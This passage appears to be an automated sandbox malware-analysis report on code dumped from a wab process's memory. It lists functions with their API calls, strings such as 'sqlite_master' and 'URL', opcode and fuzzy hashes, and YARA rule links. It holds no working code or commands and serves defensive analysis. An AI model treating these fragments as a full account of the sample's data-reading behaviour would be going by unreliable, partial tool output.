                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                    Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040B1DE
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                    • memcpy.MSVCRT ref: 0040B248
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                    Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                    Download Yara Rule
                    APIs
                    • strlen.MSVCRT ref: 0040B0D8
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                    • memcpy.MSVCRT ref: 0040B159
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocstrlen
                    • String ID:
                    • API String ID: 1171893557-0
                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004144E7
                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                    • memset.MSVCRT ref: 0041451A
                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                    • String ID:
                    • API String ID: 1127616056-0
                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: sqlite_master
                    • API String ID: 438689982-3163232059
                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                    • wcscpy.MSVCRT ref: 00414DF3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: BrowseFolderFromListMallocPathwcscpy
                    • String ID:
                    • API String ID: 3917621476-0
                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • _snwprintf.MSVCRT ref: 00410FE1
                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • _snwprintf.MSVCRT ref: 0041100C
                    • wcscat.MSVCRT ref: 0041101F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                    • String ID:
                    • API String ID: 822687973-0
                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                    • malloc.MSVCRT ref: 00417459
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                    • RegisterClassW.USER32(?), ref: 00412428
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule$ClassCreateRegisterWindow
                    • String ID:
                    • API String ID: 2678498856-0
                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00409B40
                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$Item
                    • String ID:
                    • API String ID: 3888421826-0
                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00417B7B
                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                    • GetLastError.KERNEL32 ref: 00417BB5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockUnlockmemset
                    • String ID:
                    • API String ID: 3727323765-0
                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                    Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                    • malloc.MSVCRT ref: 00417407
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040F673
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                    • strlen.MSVCRT ref: 0040F6A2
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040F6E2
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                    • strlen.MSVCRT ref: 0040F70D
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00402FD7
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                    • strlen.MSVCRT ref: 00403006
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                    • String ID:
                    • API String ID: 2754987064-0
                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                    • GetStockObject.GDI32(00000000), ref: 004143C6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                    • String ID:
                    • API String ID: 764393265-0
                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                    Download Yara Rule
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$System$File$LocalSpecific
                    • String ID:
                    • API String ID: 979780441-0
                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • memcpy.MSVCRT ref: 004134E0
                    • memcpy.MSVCRT ref: 004134F2
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$DialogHandleModuleParam
                    • String ID:
                    • API String ID: 1386444988-0
                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: InvalidateMessageRectSend
                    • String ID: d=E
                    • API String ID: 909852535-3703654223
                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 0040F79E
                    • wcschr.MSVCRT ref: 0040F7AC
                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcschr$memcpywcslen
                    • String ID: "
                    • API String ID: 1983396471-123907689
                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • _memicmp.MSVCRT ref: 0040C00D
                    • memcpy.MSVCRT ref: 0040C024
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FilePointer_memicmpmemcpy
                    • String ID: URL
                    • API String ID: 2108176848-3574463123
                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfmemcpy
                    • String ID: %2.2X
                    • API String ID: 2789212964-323797159
                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
